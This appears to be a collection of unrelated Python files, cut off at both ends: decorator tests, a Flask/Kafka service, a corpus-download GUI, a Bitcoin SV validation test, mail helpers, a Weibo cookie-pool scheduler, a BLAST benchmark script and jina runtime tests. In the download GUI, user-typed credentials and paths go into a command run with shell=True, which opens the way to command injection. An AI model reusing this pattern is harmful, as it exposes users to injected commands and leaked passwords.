        @retry_it(tries=2, wait=1, handler=handle)
        def b(a, b=True):
            raise Exception("Not yet")

        assert a() is True
        try:
            b()
        except ReusablesError:
            pass
        else:
            raise AssertionError("Should have failed")

    def test_catch_it(self):
        """@catch_it swallows the exception and returns the handler's value."""

        def handle(*args, **kwargs):
            print(args, kwargs)
            return 10

        @catch_it(handler=handle)
        def ouch():
            raise Exception("Wamp wamp")

        @catch_it()
        def b(a, b=True):
            raise Exception("Not yet")

        b()
        assert ouch() == 10
if __name__ == "__main__":
    # unittest comes in via the star import from common_test_data.
    unittest.main()
|
app.py | import sys
sys.path.insert(0,"./src/utilities/yolov5/utils")
from src.kafka_module.kf_service import block_segmenter_request_worker, process_block_segmenter_kf
from anuvaad_auditor.loghandler import log_info
from anuvaad_auditor.loghandler import log_error
from flask import Flask
from flask.blueprints import Blueprint
from flask_cors import CORS
from src import routes
import config
import threading
from src.utilities.app_context import LOG_WITHOUT_CONTEXT
merge_app = Flask(__name__)
def start_kafka():
    """Start the block-segmenter Kafka consumer and request-worker threads.

    Spawns one thread consuming block-segmenter messages from Kafka and one
    processing queued requests. Errors during thread startup are logged (not
    raised) so the Flask app can still come up.
    """
    try:
        t1 = threading.Thread(target=process_block_segmenter_kf, name='block-segmenter-consumer-thread')
        t1.start()
        # Fixed garbled log text ("multithread Kafka running on multithread").
        log_info("Started block-segmenter Kafka consumer thread", LOG_WITHOUT_CONTEXT)
        t2 = threading.Thread(target=block_segmenter_request_worker, name='block-segmenter-worker-thread')
        t2.start()
        log_info("Starting block_segmenter_request_worker", LOG_WITHOUT_CONTEXT)
    except Exception as e:
        # Boundary handler: log and continue so the HTTP API still serves.
        log_error("threading ERROR WHILE RUNNING CUSTOM THREADS ", LOG_WITHOUT_CONTEXT, e)
# Enable CORS on all /api/* routes when configured.
if config.ENABLE_CORS:
    cors = CORS(merge_app, resources={r"/api/*": {"origins": "*"}})

# Register every Blueprint object exposed by src.routes under the API prefix.
for blueprint in vars(routes).values():
    if isinstance(blueprint, Blueprint):
        merge_app.register_blueprint(blueprint, url_prefix=config.API_URL_PREFIX)

if __name__ == "__main__":
    # Kafka threads are started only when run directly, not under a WSGI server.
    start_kafka()
    print(merge_app.url_map)
    merge_app.run(host=config.HOST, port=config.PORT, debug=config.DEBUG)
|
dod_gui.py | import subprocess
import threading
import PySimpleGUI as sg
# oriented this gui on the example at:
# https://raw.githubusercontent.com/PySimpleGUI/PySimpleGUI/069d1d08dc7ec19a8c59d5c13f3b8d60115c286b/UserCreatedPrograms/jumpcutter/jumpcutter_gui.py
def main():
    """Build the download-GUI window (credentials, URL, output folder,
    chunk size, command preview, log pane) and hand it to event_loop()."""
    layout = [
        [sg.Text("Download OSCAR Corpus", font="Any 20")],
        [
            sg.Text(
                "Username:",
                size=(40, 1),
                justification="l",
                tooltip="the username for login",
            ),
            sg.Input(
                default_text="",
                key="user",
                size=(40, 1),
                tooltip="the username for login",
            ),
        ],
        [
            sg.Text(
                "Password:",
                size=(40, 1),
                justification="l",
                tooltip="the password for login",
            ),
            sg.Input(
                default_text="",
                key="password",
                size=(40, 1),
                tooltip="the password for login",
                password_char="*",
            ),
        ],
        [
            sg.Text(
                "Url:",
                size=(40, 1),
                justification="l",
                tooltip="the url to download files from",
            ),
            sg.Input(
                default_text="",
                key="base_url",
                size=(40, 1),
                tooltip="the url to download files from",
            ),
        ],
        [
            sg.Text(
                "Download folder:",
                size=(40, 1),
                justification="l",
                tooltip="the folder where files should be downloaded to",
            ),
            sg.Input(
                key="out",
                size=(40, 1),
                tooltip="the folder where files should be downloaded to",
            ),
            sg.FolderBrowse(),
        ],
        [
            sg.Text(
                "Chunk size:",
                size=(40, 1),
                justification="l",
                tooltip="the url to download files from",
            ),
            sg.Input(
                default_text="4096",
                key="chunk_size",
                size=(40, 1),
                tooltip="specifies in which chunks downloads are to be processed",
                # enable_events makes every keystroke fire a "chunk_size"
                # event so event_loop can validate it is an integer.
                enable_events=True,
            ),
        ],
        [sg.Text("Constructed Command Line:")],
        [
            sg.Text(
                size=(80, 3),
                key="cmd",
                text_color="yellow",
                font="Courier 8",
            )
        ],
        [
            # Log pane: stdout/stderr of this process are rerouted here, so
            # read_stdout()'s print() calls land in the GUI.
            sg.MLine(
                size=(80, 10),
                reroute_stdout=True,
                reroute_stderr=True,
                reroute_cprint=True,
                write_only=True,
                font="Courier 8",
                autoscroll=True,
                key="mline",
                auto_refresh=True,
            )
        ],
        [sg.Button("Start"), sg.Button("Exit")],
    ]
    window = sg.Window("Download OSCAR Corpus", layout, finalize=True)
    event_loop(window)
def event_loop(window):
    """Run the GUI event loop; launch the `dodc` download command on Start.

    Blocks until the window is closed or Exit is pressed. A started download
    runs in a subprocess whose stdout is pumped into the log pane by a reader
    thread; both are cleaned up on exit.
    """
    proc = None
    t_read = None
    try:
        while True:
            event, values = window.read()
            if event in (sg.WIN_CLOSED, "Exit"):
                break
            if event == "chunk_size" and values["chunk_size"]:
                validate_int(window, "chunk_size", values)
            if event == "Start":
                # NOTE(review): relies on dict insertion order matching the
                # layout (user, password, base_url, out, <browse>, chunk_size)
                # — fragile if fields are added; confirm before changing layout.
                user, password, base_url, out, _, chunk_size = values.values()
                command = f"dodc --user={user} --password={password} --base_url={base_url} --chunk_size={chunk_size} --out={out}"
                window["cmd"].update(command)
                window.refresh()
                proc = subprocess.Popen(
                    command,
                    shell=True,
                    stdout=subprocess.PIPE,
                    stderr=subprocess.STDOUT,  # merge stderr into the log pane
                )
                t_read = threading.Thread(target=read_stdout, args=(proc, window))
                t_read.start()
    finally:
        # NOTE(review): only the most recent proc/thread is cleaned up if
        # Start was pressed multiple times.
        window.close()
        if proc is not None:
            proc.terminate()
        if t_read is not None:
            t_read.join()
def read_stdout(proc, window):
    """Pump the child's stdout into the GUI log until the stream closes."""
    stream = proc.stdout
    for raw_line in stream:
        text = raw_line.decode()
        print(text.strip())
        window.refresh()
def validate_int(window, key, values):
    """Ensure the value under *key* parses as an integer.

    Called from the event loop on every keystroke in the chunk-size field.
    On a parse failure it pops up a warning and strips the offending last
    character from the input widget.
    """
    try:
        int(values[key])
    except (TypeError, ValueError):
        # Only a parse failure should trigger the popup; previously a bare
        # `except Exception` also hid programming errors such as a bad key.
        sg.popup("Only integer values allowed.")
        window[key].update(values[key][:-1])
if __name__ == "__main__":
    # Build the window and enter the blocking GUI event loop.
    main()
|
bsv-pbv-submitblock.py | #!/usr/bin/env python3
# Copyright (c) 2019 Bitcoin Association
# Distributed under the Open BSV software license, see the accompanying file LICENSE.
"""
We will test the following situation where block 1 is the tip and three blocks
are sent for parallel validation:
1
/ | \
2 3 4
Blocks 2,4 are hard to validate and block 3 is easy to validate.
- Blocks 2,3 are sent via p2p.
- Block 4 is submitted via rpc command submitblock.
Block 3 should be active in the end because it was easiest to validate and
therefore won the validation race.
*This test is similar to bsv-pbv-submitminingsolution.py, which uses a different
RPC call to submit the block.
Additionally this test also checks that blocks with same height but later arrival
are also announced to the network after being validated. (lines marked with ***
at the beginning of comments)
"""
import threading
from test_framework.util import (
assert_equal,
p2p_port,
get_rpc_proxy,
rpc_url,
get_datadir_path,
wait_until
)
from test_framework.mininode import (
NetworkThread,
NodeConn,
NodeConnCB,
msg_block,
msg_sendcmpct,
msg_getheaders,
ToHex,
CInv
)
from test_framework.test_framework import BitcoinTestFramework, ChainManager
from bsv_pbv_common import (
wait_for_waiting_blocks,
wait_for_validating_blocks
)
class PBVSubmitBlock(BitcoinTestFramework):
    """Race three sibling tip blocks (two via p2p, one via RPC submitblock)
    through parallel validation and assert the easiest one wins the tip."""

    def set_test_params(self):
        # Single fresh-chain node; whitelist localhost so blocks relay
        # without delay.
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.chain = ChainManager()
        self.extra_args = [["-whitelist=127.0.0.1"]]

    def run_test(self):
        """Mine a 101-block base chain, then race blocks 2/3/4 at height 102."""
        block_count = 0
        # Create a P2P connections
        node0 = NodeConnCB()
        connection0 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0)
        node0.add_connection(connection0)
        node1 = NodeConnCB()
        connection1 = NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node1)
        node1.add_connection(connection1)
        # *** Prepare node connection for early announcements testing
        node2 = NodeConnCB()
        node2.add_connection(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node2))
        NetworkThread().start()
        # wait_for_verack ensures that the P2P connection is fully up.
        node0.wait_for_verack()
        node1.wait_for_verack()
        # *** Activate early announcement functionality for this connection
        # After this point the early announcements are not received yet -
        # we still need to set latest announced block (CNode::pindexBestKnownBlock)
        # which is set for e.g. by calling best headers message with locator
        # set to non-null
        node2.wait_for_verack()
        node2.send_message(msg_sendcmpct(announce=True))
        self.chain.set_genesis_hash(int(self.nodes[0].getbestblockhash(), 16))
        block = self.chain.next_block(block_count)
        block_count += 1
        self.chain.save_spendable_output()
        node0.send_message(msg_block(block))
        # Mine 100 more blocks so the first coinbase matures and is spendable.
        for i in range(100):
            block = self.chain.next_block(block_count)
            block_count += 1
            self.chain.save_spendable_output()
            node0.send_message(msg_block(block))
        out = self.chain.get_spendable_output()
        self.log.info("waiting for block height 101 via rpc")
        self.nodes[0].waitforblockheight(101)
        tip_block_num = block_count - 1
        # adding extra transactions to get different block hashes
        block2_hard = self.chain.next_block(block_count, spend=out, extra_txns=8)
        block_count += 1
        self.chain.set_tip(tip_block_num)
        block3_easier = self.chain.next_block(block_count, spend=out, extra_txns=2)
        block_count += 1
        self.chain.set_tip(tip_block_num)
        block4_hard = self.chain.next_block(block_count, spend=out, extra_txns=10)
        block_count += 1
        # send three "hard" blocks, with waitaftervalidatingblock we artificially
        # extend validation time.
        self.log.info(f"hard block2 hash: {block2_hard.hash}")
        self.nodes[0].waitaftervalidatingblock(block2_hard.hash, "add")
        self.log.info(f"hard block4 hash: {block4_hard.hash}")
        self.nodes[0].waitaftervalidatingblock(block4_hard.hash, "add")
        # make sure block hashes are in waiting list
        wait_for_waiting_blocks({block2_hard.hash, block4_hard.hash}, self.nodes[0], self.log)
        # *** Complete early announcement setup by sending getheaders message
        # with a non-null locator (pointing to the last block that we know
        # of on python side - we claim that we know of all the blocks that
        # bitcoind node knows of)
        #
        # We also set on_cmpctblock handler as early announced blocks are
        # announced via compact block messages instead of inv messages
        node2.send_and_ping(msg_getheaders(locator_have=[int(self.nodes[0].getbestblockhash(), 16)]))
        receivedAnnouncement = False
        waiting_for_announcement_block_hash = block2_hard.sha256

        def on_cmpctblock(conn, message):
            nonlocal receivedAnnouncement
            message.header_and_shortids.header.calc_sha256()
            if message.header_and_shortids.header.sha256 == waiting_for_announcement_block_hash:
                receivedAnnouncement = True

        node2.on_cmpctblock = on_cmpctblock
        # send one block via p2p and one via rpc
        node0.send_message(msg_block(block2_hard))
        # *** make sure that we receive announcement of the block before it has
        # been validated
        wait_until(lambda: receivedAnnouncement)
        # making rpc call submitblock in a separate thread because waitaftervalidation is blocking
        # the return of submitblock
        submitblock_thread = threading.Thread(target=self.nodes[0].submitblock, args=(ToHex(block4_hard),))
        submitblock_thread.start()
        # because self.nodes[0] rpc is blocked we use another rpc client
        rpc_client = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0), 0,
                                   coveragedir=self.options.coveragedir)
        wait_for_validating_blocks({block2_hard.hash, block4_hard.hash}, rpc_client, self.log)
        # *** prepare to intercept block3_easier announcement - it will not be
        # announced before validation is complete as early announcement is
        # limited to announcing one block per height (siblings are ignored)
        # but after validation is complete we should still get the announcing
        # compact block message
        receivedAnnouncement = False
        waiting_for_announcement_block_hash = block3_easier.sha256
        self.log.info(f"easy block3 hash: {block3_easier.hash}")
        node1.send_message(msg_block(block3_easier))
        # *** Make sure that we receive compact block announcement of the block
        # after the validation is complete even though it was not the first
        # block that was received by bitcoind node.
        #
        # Also make sure that we receive inv announcement of the block after
        # the validation is complete by the nodes that are not using early
        # announcement functionality.
        wait_until(lambda: receivedAnnouncement)
        node0.wait_for_inv([CInv(2, block3_easier.sha256)])  # 2 == GetDataMsg::MSG_BLOCK
        # node 1 was the sender but receives inv for block non the less
        # (with early announcement that's not the case - sender does not receive the announcement)
        node1.wait_for_inv([CInv(2, block3_easier.sha256)])  # 2 == GetDataMsg::MSG_BLOCK
        rpc_client.waitforblockheight(102)
        assert_equal(block3_easier.hash, rpc_client.getbestblockhash())
        # now we can remove waiting status from blocks and finish their validation
        rpc_client.waitaftervalidatingblock(block2_hard.hash, "remove")
        rpc_client.waitaftervalidatingblock(block4_hard.hash, "remove")
        submitblock_thread.join()
        # wait till validation of block or blocks finishes
        node0.sync_with_ping()
        # easier block should still be on tip
        assert_equal(block3_easier.hash, self.nodes[0].getbestblockhash())
if __name__ == '__main__':
    # BitcoinTestFramework.main() parses args, spins up nodes, runs run_test().
    PBVSubmitBlock().main()
|
emails.py | #!/usr/bin/python3
"""
@Author : Zhaohui Mei(梅朝辉)
@Email : mzh.whut@gmail.com
@Time : 2018/12/1 10:37
@File : emails.py
@Version : 1.0
@Interpreter: Python3.6.2
@Software: PyCharm
@Description: 邮件通知设置
"""
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
    # Thread worker: Flask-Mail reads config from the application, so an
    # app context must be pushed before sending.
    with app.app_context():
        mail.send(message)
def send_async_mail(subject, to, html):
    """Send an e-mail on a background thread and return the started Thread."""
    app = current_app._get_current_object()  # unwrap the real app behind the proxy
    message = Message(subject, recipients=[to], html=html)
    thr = Thread(target=_send_async_mail, args=[app, message])
    thr.start()
    return thr
def send_new_comment_email(post):
    """E-mail the blog admin that *post* received a new comment."""
    anchor = '#comments'
    post_url = url_for('blog.show_post', post_id=post.id,
                       _external=True) + anchor
    body = (
        f'<p>New comment in post <i>{post.title}</i>,'
        f' click the link below to check:</p>'
        f'<p><a href="{post_url}">{post_url}</a></p>'
        f'<p><small style="color:#868e96">'
        f'Do not reply this email.</small></p>'
    )
    admin_address = current_app.config['BLUELOG_ADMIN_EMAIL']
    send_async_mail(subject='New Comment', to=admin_address, html=body)
def send_new_reply_email(comment):
    """E-mail the author of *comment* that it received a reply."""
    anchor = '#comments'
    post_url = url_for('blog.show_post', post_id=comment.post_id,
                       _external=True) + anchor
    body = (
        f'<p>New reply for the comment you left in post <i>{comment.post.title}</i>,'
        f' click the link below to check:</p>'
        f'<p><a href="{post_url}">{post_url}</a></p>'
        f'<p><small style="color:#868e96">'
        f'Do not reply this email.</small></p>'
    )
    send_async_mail(subject='New Reply', to=comment.email, html=body)
|
scheduler.py | import time
import traceback
from multiprocessing import Process
from cookiespool.api import app
from cookiespool.config import CYCLE, TESTER_MAP, API_PORT, API_HOST, API_PROCESS, GENERATOR_PROCESS, VALID_PROCESS
from cookiespool.config import GENERATOR_MAP
from cookiespool.tester import WeiboValidTester
from cookiespool.generator import WeiboCookiesGenerator
class Scheduler(object):
    """Launch the cookie-pool services (tester, generator, API) as processes."""

    @staticmethod
    def valid_cookie(cycle=CYCLE):
        """Loop forever, running every configured cookie tester each cycle."""
        while True:
            print('Cookies检测进程开始运行')
            try:
                for website, cls in TESTER_MAP.items():
                    # Look the class up by name instead of eval()-ing a code
                    # string built from config values. Same behavior (the
                    # tester classes are imported at module level) without
                    # executing arbitrary config-derived code.
                    tester = globals()[cls](website=website)
                    tester.run()
                    print('Cookies检测完成')
                    del tester
                    time.sleep(cycle)
            except Exception as e:
                # Log and keep looping: one tester failing must not kill the
                # whole validation process.
                print(e.args)
                print(traceback.format_exc())

    @staticmethod
    def generate_cookie(cycle=CYCLE):
        """Loop forever, running every configured cookie generator each cycle."""
        while True:
            print('Cookies生成进程开始运行')
            try:
                for website, cls in GENERATOR_MAP.items():
                    # Same name-lookup replacement for the former eval() call.
                    generator = globals()[cls](website=website)
                    generator.run()
                    print('Cookies生成完成')
                    time.sleep(cycle)
            except Exception as e:
                print(e.args)
                print(traceback.format_exc())

    @staticmethod
    def api():
        """Run the HTTP API (blocking)."""
        print('API接口开始运行')
        app.run(host=API_HOST, port=API_PORT)

    def run(self):
        """Start the enabled services, each in its own process."""
        # API服务运行
        if API_PROCESS:
            api_process = Process(target=Scheduler.api)
            api_process.start()
        # 自动检测新添加的账号及生成cookie服务
        if GENERATOR_PROCESS:
            generate_process = Process(target=Scheduler.generate_cookie)
            generate_process.start()
        # 检查cookie是否有效服务
        if VALID_PROCESS:
            valid_process = Process(target=Scheduler.valid_cookie)
            valid_process.start()
|
runblast.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from threading import Thread, Event
import time
# import threading
import psutil
import datetime
import os
import subprocess
# command = "blastn -db nt -evalue 1e-05 -query arquivo.fasta -out arquivoblast"
#monitor cpu and memory
# [1:09 PM, 3/14/2016] Mauro: Monitorar o desempenho das máquinas (se alcançam o máximo de CPU ou memória; se travam)
# [1:10 PM, 3/14/2016] Mauro: E verificar a relação (tamanho, no de reads, no de hits) entre os arquivos de entrada e saída.
# Raony, sugiro:
# 1) Pega 1 dos arquivos 'good', quebra ele em diferentes tamanhos: 50, 25, 12.5, 6.25, 3.125 1,5625% do original
# 2) Roda cada um em um webservice diferente, em instâncias padrão da AWS de aproximadamente 8, 20 e 50 Gb de RAM, com o processamento correspondente.
# 3) monitore: tempo de processamento em cada instância, uso médio da CPU e da RAM, tamanho do arquivo de saída.
# 4) quando fragmentar o arquivo inicial em pedaços de 6,25% do total, coloque 8 deles (~50%) na fila do mesmo webservice pra monitorar o tempo de execução e comparar com 1 arquivo de 50%
output = open("monitor.log", "w")
def monitor(arg1, stop_event):
    # Sample CPU and memory roughly once per second until stop_event is set
    # (cpu_percent(interval=1) blocks for the sampling window), appending one
    # tab-separated line per sample to the module-level `output` log file.
    # `arg1` is unused — kept for the Thread(args=...) call signature.
    while(not stop_event.is_set()):
        cpu = psutil.cpu_percent(interval=1)
        mem = psutil.virtual_memory()
        output_list = []
        output_list.append("DATE:"+str(datetime.datetime.now()))
        # "used" = total minus available, i.e. memory not reclaimable right now.
        used = mem.total - mem.available
        output_list.append("CPU:"+str(cpu))
        output_list.append("MEMORY:"+str(int(used / 1024 / 1024))+" MB")
        output.writelines("\t".join(output_list)+"\n")
        print(output_list)
# Start the resource monitor on a background thread; t2_stop signals it to stop.
t2_stop = Event()
# Renamed from `monitor`: the old name shadowed the monitor() function above.
monitor_thread = Thread(target=monitor, args=(2, t2_stop))
monitor_thread.start()

# Run BLAST over progressively larger fractions of the input file.
sizes = [0.015625, 0.03125, 0.0625, 0.125, 0.25, 0.5]
for size in sizes:
    print("Running BLAST for %s \n" % (size))
    output.writelines("Running BLAST for %s \n" % (size))
    file_prefix = str(size).replace('.', '_')
    filename = "test_blast_%s.fasta" % (file_prefix)
    command = "time blastn -db nt -evalue 1e-05 -query %s -out blast_output_%s.fasta" % (filename, file_prefix)
    # command = """echo "blast" """
    command = "sleep 2"  # NOTE: stub that overrides the real BLAST command
    out = subprocess.check_output(command.split())
    print(out.decode("utf-8"))
    # BUGFIX: check_output() returns bytes; writelines(bytes) on a text-mode
    # file iterates ints and raises TypeError. Decode once and write the str.
    output.write(out.decode("utf-8"))

# Throughput test: 8 sequential runs of the 6.25% file.
size = 0.0625
print("Running 8 BLASTS for %s \n" % (size))
output.writelines("Running 8 BLASTS for %s \n" % (size))
for i in range(1, 9):
    print(i)
    output.writelines(str(i)+"\n")
    file_prefix = str(size).replace('.', '_')
    filename = "test_blast_%s.fasta" % (file_prefix)
    command = "time blastn -db nt -evalue 1e-05 -query %s -out blast_output_%s.fasta" % (filename, file_prefix)
    command = "sleep 2"  # NOTE: stub that overrides the real BLAST command
    out = subprocess.check_output(command.split())
    print(out.decode("utf-8"))
    output.write(out.decode("utf-8"))  # BUGFIX: see note above

# Stop and join the monitor, then close the log file.
t2_stop.set()
monitor_thread.join()
output.close()
|
test_runtimes.py | import asyncio
import json
import multiprocessing
import threading
import time
from collections import defaultdict
import pytest
from jina import Client, Document, Executor, requests
from jina.enums import PollingType
from jina.parsers import set_gateway_parser, set_pod_parser
from jina.serve.runtimes.asyncio import AsyncNewLoopRuntime
from jina.serve.runtimes.gateway.grpc import GRPCGatewayRuntime
from jina.serve.runtimes.gateway.http import HTTPGatewayRuntime
from jina.serve.runtimes.gateway.websocket import WebSocketGatewayRuntime
from jina.serve.runtimes.head import HeadRuntime
from jina.serve.runtimes.worker import WorkerRuntime
@pytest.mark.asyncio
# test gateway, head and worker runtime by creating them manually in the most simple configuration
async def test_runtimes_trivial_topology(port_generator):
    """gateway -> head -> single worker; 20 requests must each return 1 doc."""
    worker_port = port_generator()
    head_port = port_generator()
    port = port_generator()
    graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
    pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
    # create a single worker runtime
    worker_process = multiprocessing.Process(
        target=_create_worker_runtime, args=(worker_port,)
    )
    worker_process.start()
    # create a single head runtime
    connection_list_dict = {'0': [f'127.0.0.1:{worker_port}']}
    head_process = multiprocessing.Process(
        target=_create_head_runtime, args=(head_port, connection_list_dict)
    )
    head_process.start()
    # create a single gateway runtime
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, pod_addresses, port),
    )
    gateway_process.start()
    await asyncio.sleep(1.0)
    # Wait for each runtime to report ready before sending traffic.
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{head_port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{worker_port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    # send requests to the gateway
    c = Client(host='localhost', port=port, asyncio=True)
    responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response)
    # clean up runtimes
    gateway_process.terminate()
    head_process.terminate()
    worker_process.terminate()
    gateway_process.join()
    head_process.join()
    worker_process.join()
    # async_inputs (defined elsewhere in this file) presumably yields 20 docs.
    assert len(response_list) == 20
    assert len(response_list[0].docs) == 1
    # exitcode 0 proves the runtimes shut down cleanly on terminate().
    assert gateway_process.exitcode == 0
    assert head_process.exitcode == 0
    assert worker_process.exitcode == 0
@pytest.fixture
def complete_graph_dict():
    """Flow-like graph with branching, merging and one hanging pod (pod6)."""
    return {
        'start-gateway': ['pod0', 'pod4', 'pod6'],
        'pod0': ['pod1', 'pod2'],
        'pod1': ['end-gateway'],
        'pod2': ['pod3'],
        'pod4': ['pod5'],
        'merger': ['pod_last'],
        'pod5': ['merger'],
        'pod3': ['merger'],
        'pod6': [],  # hanging_pod
        'pod_last': ['end-gateway'],
    }
@pytest.mark.asyncio
@pytest.mark.parametrize('uses_before', [True, False])
@pytest.mark.parametrize('uses_after', [True, False])
# test gateway, head and worker runtime by creating them manually in a more Flow like topology with branching/merging
async def test_runtimes_flow_topology(
    complete_graph_dict, uses_before, uses_after, port_generator
):
    """Hand-build the branching/merging graph, optionally with uses_before /
    uses_after workers per pod, and verify 20 requests flow through."""
    pods = [
        pod_name for pod_name in complete_graph_dict.keys() if 'gateway' not in pod_name
    ]
    runtime_processes = []
    # pod_addresses is assembled as a JSON string piece by piece.
    pod_addresses = '{'
    for pod in pods:
        if uses_before:
            uses_before_port, uses_before_process = await _create_worker(
                pod, port_generator, type='uses_before'
            )
            AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
                timeout=5.0,
                ready_or_shutdown_event=threading.Event(),
                ctrl_address=f'127.0.0.1:{uses_before_port}',
            )
            runtime_processes.append(uses_before_process)
        if uses_after:
            uses_after_port, uses_after_process = await _create_worker(
                pod, port_generator, type='uses_after'
            )
            AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
                timeout=5.0,
                ready_or_shutdown_event=threading.Event(),
                ctrl_address=f'127.0.0.1:{uses_after_port}',
            )
            runtime_processes.append(uses_after_process)
        # create worker
        worker_port, worker_process = await _create_worker(pod, port_generator)
        AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
            timeout=5.0,
            ready_or_shutdown_event=threading.Event(),
            ctrl_address=f'127.0.0.1:{worker_port}',
        )
        runtime_processes.append(worker_process)
        # create head
        head_port = port_generator()
        pod_addresses += f'"{pod}": ["0.0.0.0:{head_port}"],'
        connection_list_dict = {'0': [f'127.0.0.1:{worker_port}']}
        head_process = multiprocessing.Process(
            target=_create_head_runtime,
            args=(
                head_port,
                connection_list_dict,
                f'{pod}/head',
                'ANY',
                f'127.0.0.1:{uses_before_port}' if uses_before else None,
                f'127.0.0.1:{uses_after_port}' if uses_after else None,
            ),
        )
        runtime_processes.append(head_process)
        head_process.start()
        await asyncio.sleep(0.1)
    # remove last comma
    pod_addresses = pod_addresses[:-1]
    pod_addresses += '}'
    port = port_generator()
    # create a single gateway runtime
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(json.dumps(complete_graph_dict), pod_addresses, port),
    )
    gateway_process.start()
    await asyncio.sleep(0.1)
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    # send requests to the gateway
    c = Client(host='localhost', port=port, asyncio=True)
    responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response)
    # clean up runtimes
    gateway_process.terminate()
    for process in runtime_processes:
        process.terminate()
    gateway_process.join()
    for process in runtime_processes:
        process.join()
    assert len(response_list) == 20
    assert len(response_list[0].docs) == 1
    assert gateway_process.exitcode == 0
    for process in runtime_processes:
        assert process.exitcode == 0
@pytest.mark.asyncio
@pytest.mark.parametrize('polling', ['ALL', 'ANY'])
# test simple topology with shards
async def test_runtimes_shards(polling, port_generator):
    """One head fanning out to 10 shard workers under ALL or ANY polling."""
    head_port = port_generator()
    port = port_generator()
    graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
    pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
    # create the shards
    shard_processes = []
    worker_ports = []
    connection_list_dict = defaultdict(list)
    for i in range(10):
        # create worker
        worker_port = port_generator()
        # create a single worker runtime
        worker_process = multiprocessing.Process(
            target=_create_worker_runtime, args=(worker_port, f'pod0/shard/{i}')
        )
        shard_processes.append(worker_process)
        worker_process.start()
        await asyncio.sleep(0.1)
        worker_ports.append(worker_port)
        # one connection-list entry per shard index
        connection_list_dict[i].append(f'127.0.0.1:{worker_port}')
    # create a single head runtime
    head_process = multiprocessing.Process(
        target=_create_head_runtime,
        args=(head_port, connection_list_dict, 'head', polling),
    )
    head_process.start()
    # create a single gateway runtime
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, pod_addresses, port),
    )
    gateway_process.start()
    await asyncio.sleep(1.0)
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    c = Client(host='localhost', port=port, asyncio=True)
    responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response)
    # clean up runtimes
    gateway_process.terminate()
    head_process.terminate()
    for shard_process in shard_processes:
        shard_process.terminate()
    gateway_process.join()
    head_process.join()
    for shard_process in shard_processes:
        shard_process.join()
    assert len(response_list) == 20
    # ANY routes to one shard; ALL aggregates docs from every shard.
    assert len(response_list[0].docs) == 1 if polling == 'ANY' else len(shard_processes)
    assert gateway_process.exitcode == 0
    assert head_process.exitcode == 0
    for shard_process in shard_processes:
        assert shard_process.exitcode == 0
@pytest.mark.asyncio
# test simple topology with replicas
async def test_runtimes_replicas(port_generator):
    """One head load-balancing across 10 replicas of the same worker."""
    head_port = port_generator()
    port = port_generator()
    graph_description = '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
    pod_addresses = f'{{"pod0": ["0.0.0.0:{head_port}"]}}'
    # create the shards
    replica_processes = []
    worker_ports = []
    connection_list_dict = defaultdict(list)
    for i in range(10):
        # create worker
        worker_port = port_generator()
        # create a single worker runtime
        worker_process = multiprocessing.Process(
            target=_create_worker_runtime, args=(worker_port, f'pod0/{i}')
        )
        replica_processes.append(worker_process)
        worker_process.start()
        await asyncio.sleep(0.1)
        worker_ports.append(worker_port)
        # all replicas share connection-list key 0 (unlike the shards test)
        connection_list_dict[0].append(f'127.0.0.1:{worker_port}')
    # create a single head runtime
    head_process = multiprocessing.Process(
        target=_create_head_runtime, args=(head_port, connection_list_dict, 'head')
    )
    head_process.start()
    # create a single gateway runtime
    gateway_process = multiprocessing.Process(
        target=_create_gateway_runtime,
        args=(graph_description, pod_addresses, port),
    )
    gateway_process.start()
    await asyncio.sleep(1.0)
    AsyncNewLoopRuntime.wait_for_ready_or_shutdown(
        timeout=5.0,
        ctrl_address=f'0.0.0.0:{port}',
        ready_or_shutdown_event=multiprocessing.Event(),
    )
    c = Client(host='localhost', port=port, asyncio=True)
    responses = c.post('/', inputs=async_inputs, request_size=1, return_responses=True)
    response_list = []
    async for response in responses:
        response_list.append(response)
    # clean up runtimes
    gateway_process.terminate()
    head_process.terminate()
    for replica_process in replica_processes:
        replica_process.terminate()
    gateway_process.join()
    head_process.join()
    for replica_process in replica_processes:
        replica_process.join()
    assert len(response_list) == 20
    assert len(response_list[0].docs) == 1
    assert gateway_process.exitcode == 0
    assert head_process.exitcode == 0
    for replica_process in replica_processes:
